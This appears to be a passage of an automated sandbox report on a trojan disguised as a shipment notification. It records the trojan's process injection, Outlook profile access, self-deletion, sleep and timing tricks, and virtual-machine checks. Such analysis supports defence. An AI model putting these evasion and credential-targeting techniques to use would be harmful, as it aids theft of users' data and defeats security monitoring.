Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29760 NtOpenProcess, 2_2_01B29760
Sample file is different than original file name gathered from version info
Source: Shipment_notification.exe, 00000000.00000002.340502146.00000000035E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameOutimurs.dll2 vs Shipment_notification.exe
Source: Shipment_notification.exe, 00000000.00000002.336955451.00000000026B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCruiser.dll, vs Shipment_notification.exe
Source: Shipment_notification.exe, 00000000.00000002.336955451.00000000026A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCruiser.dll, vs Shipment_notification.exe
Source: Shipment_notification.exe, 00000000.00000002.336955451.0000000002627000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCruiser.dll, vs Shipment_notification.exe
Source: Shipment_notification.exe, 00000000.00000002.353586112.0000000006DF0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameOutimurs.dll2 vs Shipment_notification.exe
Source: Shipment_notification.exe, 00000002.00000003.333262180.00000000018A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment_notification.exe
Source: Shipment_notification.exe, 00000002.00000003.336325695.0000000001A43000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment_notification.exe
Source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A85000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Shipment_notification.exe
Source: Shipment_notification.exe, 00000002.00000002.378214888.0000000001BDF000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment_notification.exe
Source: Shipment_notification.exe Binary or memory string: OriginalFilenameCYYO.exe> vs Shipment_notification.exe
Source: Shipment_notification.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Shipment_notification.exe ReversingLabs: Detection: 39%
Source: Shipment_notification.exe Virustotal: Detection: 43%
Source: Shipment_notification.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Shipment_notification.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
Source: C:\Users\user\Desktop\Shipment_notification.exe Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
Source: C:\Users\user\Desktop\Shipment_notification.exe Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Users\user\Desktop\Shipment_notification.exe Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipment_notification.exe.log Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File created: C:\Users\user\AppData\Local\Temp\10W12dX Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/3@12/7
Source: Shipment_notification.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Shipment_notification.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Shipment_notification.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Shipment_notification.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Shipment_notification.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: CYYO.pdb source: Shipment_notification.exe
Source: Binary string: wntdll.pdbUGP source: Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: control.pdb source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Shipment_notification.exe, Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CYYO.pdbSHA256 source: Shipment_notification.exe
Source: Binary string: control.pdbUGP source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00411824 push ds; ret 2_2_00411825
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_004108E0 push ecx; retf 2_2_004108E1
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041BC00 push eax; iretd 2_2_0041BC01
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00410CF7 push ecx; iretd 2_2_00410D0E
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041A550 push ecx; retf 2_2_0041A55A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041B56C push ss; retf 2_2_0041B56D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041A523 push edx; ret 2_2_0041A524
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00405DEB push 00000056h; retf 2_2_00405DEF
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00401D80 push eax; ret 2_2_00401D82
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041B5B8 pushad ; iretd 2_2_0041B5B9
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00406E76 pushfd ; ret 2_2_00406E77
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00410631 push ecx; retf 2_2_00410632
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00405F31 push ss; iretd 2_2_00405F51
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B3D0D1 push ecx; ret 2_2_01B3D0E4
Source: initial sample Static PE information: section name: .text entropy: 7.877600970637655

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\SysWOW64\control.exe File deleted: c:\users\user\desktop\shipment_notification.exe Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Shipment_notification.exe TID: 1364 Thread sleep time: -40023s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe TID: 3648 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 4540 Thread sleep time: -44000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB5BA5 rdtsc 2_2_01BB5BA5
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Shipment_notification.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 884 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 870 Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Thread delayed: delay time: 40023 Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000003.00000003.548908442.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.533768505.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535250683.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.560492432.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: explorer.exe, 00000003.00000000.357414824.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000003.550742798.000000000870B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000003.00000000.357414824.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.550742798.000000000870B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.582481631.0000000004424000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.550742798.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.357414824.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB5BA5 rdtsc 2_2_01BB5BA5
Enables debug privileges
Source: C:\Users\user\Desktop\Shipment_notification.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B651BE mov eax, dword ptr fs:[00000030h] 2_2_01B651BE
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B651BE mov eax, dword ptr fs:[00000030h] 2_2_01B651BE
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B651BE mov eax, dword ptr fs:[00000030h] 2_2_01B651BE
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B651BE mov eax, dword ptr fs:[00000030h] 2_2_01B651BE
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B669A6 mov eax, dword ptr fs:[00000030h] 2_2_01B669A6
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B161A0 mov eax, dword ptr fs:[00000030h] 2_2_01B161A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B161A0 mov eax, dword ptr fs:[00000030h] 2_2_01B161A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B12990 mov eax, dword ptr fs:[00000030h] 2_2_01B12990
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B0C182 mov eax, dword ptr fs:[00000030h] 2_2_01B0C182
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1A185 mov eax, dword ptr fs:[00000030h] 2_2_01B1A185
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEB1E1 mov eax, dword ptr fs:[00000030h] 2_2_01AEB1E1
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEB1E1 mov eax, dword ptr fs:[00000030h] 2_2_01AEB1E1
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEB1E1 mov eax, dword ptr fs:[00000030h] 2_2_01AEB1E1
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B741E8 mov eax, dword ptr fs:[00000030h] 2_2_01B741E8
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1513A mov eax, dword ptr fs:[00000030h] 2_2_01B1513A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1513A mov eax, dword ptr fs:[00000030h] 2_2_01B1513A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B04120 mov eax, dword ptr fs:[00000030h] 2_2_01B04120
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B04120 mov eax, dword ptr fs:[00000030h] 2_2_01B04120
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B04120 mov eax, dword ptr fs:[00000030h] 2_2_01B04120
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B04120 mov eax, dword ptr fs:[00000030h] 2_2_01B04120
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B04120 mov ecx, dword ptr fs:[00000030h] 2_2_01B04120
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE9100 mov eax, dword ptr fs:[00000030h] 2_2_01AE9100
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE9100 mov eax, dword ptr fs:[00000030h] 2_2_01AE9100
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE9100 mov eax, dword ptr fs:[00000030h] 2_2_01AE9100
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEC962 mov eax, dword ptr fs:[00000030h] 2_2_01AEC962
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEB171 mov eax, dword ptr fs:[00000030h] 2_2_01AEB171
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEB171 mov eax, dword ptr fs:[00000030h] 2_2_01AEB171
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B0B944 mov eax, dword ptr fs:[00000030h] 2_2_01B0B944
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B0B944 mov eax, dword ptr fs:[00000030h] 2_2_01B0B944
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1F0BF mov ecx, dword ptr fs:[00000030h] 2_2_01B1F0BF
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1F0BF mov eax, dword ptr fs:[00000030h] 2_2_01B1F0BF
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1F0BF mov eax, dword ptr fs:[00000030h] 2_2_01B1F0BF
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h] 2_2_01B120A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h] 2_2_01B120A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h] 2_2_01B120A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h] 2_2_01B120A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h] 2_2_01B120A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B120A0 mov eax, dword ptr fs:[00000030h] 2_2_01B120A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B290AF mov eax, dword ptr fs:[00000030h] 2_2_01B290AF
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE9080 mov eax, dword ptr fs:[00000030h] 2_2_01AE9080
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B63884 mov eax, dword ptr fs:[00000030h] 2_2_01B63884
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B63884 mov eax, dword ptr fs:[00000030h] 2_2_01B63884
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE58EC mov eax, dword ptr fs:[00000030h] 2_2_01AE58EC
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7B8D0 mov eax, dword ptr fs:[00000030h] 2_2_01B7B8D0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_01B7B8D0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7B8D0 mov eax, dword ptr fs:[00000030h] 2_2_01B7B8D0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7B8D0 mov eax, dword ptr fs:[00000030h] 2_2_01B7B8D0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7B8D0 mov eax, dword ptr fs:[00000030h] 2_2_01B7B8D0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7B8D0 mov eax, dword ptr fs:[00000030h] 2_2_01B7B8D0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFB02A mov eax, dword ptr fs:[00000030h] 2_2_01AFB02A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFB02A mov eax, dword ptr fs:[00000030h] 2_2_01AFB02A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFB02A mov eax, dword ptr fs:[00000030h] 2_2_01AFB02A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFB02A mov eax, dword ptr fs:[00000030h] 2_2_01AFB02A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1002D mov eax, dword ptr fs:[00000030h] 2_2_01B1002D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1002D mov eax, dword ptr fs:[00000030h] 2_2_01B1002D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1002D mov eax, dword ptr fs:[00000030h] 2_2_01B1002D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1002D mov eax, dword ptr fs:[00000030h] 2_2_01B1002D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1002D mov eax, dword ptr fs:[00000030h] 2_2_01B1002D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B67016 mov eax, dword ptr fs:[00000030h] 2_2_01B67016
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B67016 mov eax, dword ptr fs:[00000030h] 2_2_01B67016
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B67016 mov eax, dword ptr fs:[00000030h] 2_2_01B67016
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB4015 mov eax, dword ptr fs:[00000030h] 2_2_01BB4015
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB4015 mov eax, dword ptr fs:[00000030h] 2_2_01BB4015
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA2073 mov eax, dword ptr fs:[00000030h] 2_2_01BA2073
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB1074 mov eax, dword ptr fs:[00000030h] 2_2_01BB1074
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B00050 mov eax, dword ptr fs:[00000030h] 2_2_01B00050
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B00050 mov eax, dword ptr fs:[00000030h] 2_2_01B00050
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B14BAD mov eax, dword ptr fs:[00000030h] 2_2_01B14BAD
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B14BAD mov eax, dword ptr fs:[00000030h] 2_2_01B14BAD
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B14BAD mov eax, dword ptr fs:[00000030h] 2_2_01B14BAD
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB5BA5 mov eax, dword ptr fs:[00000030h] 2_2_01BB5BA5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF1B8F mov eax, dword ptr fs:[00000030h] 2_2_01AF1B8F
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF1B8F mov eax, dword ptr fs:[00000030h] 2_2_01AF1B8F
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1B390 mov eax, dword ptr fs:[00000030h] 2_2_01B1B390
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B12397 mov eax, dword ptr fs:[00000030h] 2_2_01B12397
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA138A mov eax, dword ptr fs:[00000030h] 2_2_01BA138A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B9D380 mov ecx, dword ptr fs:[00000030h] 2_2_01B9D380
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h] 2_2_01B103E2
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h] 2_2_01B103E2
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h] 2_2_01B103E2
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h] 2_2_01B103E2
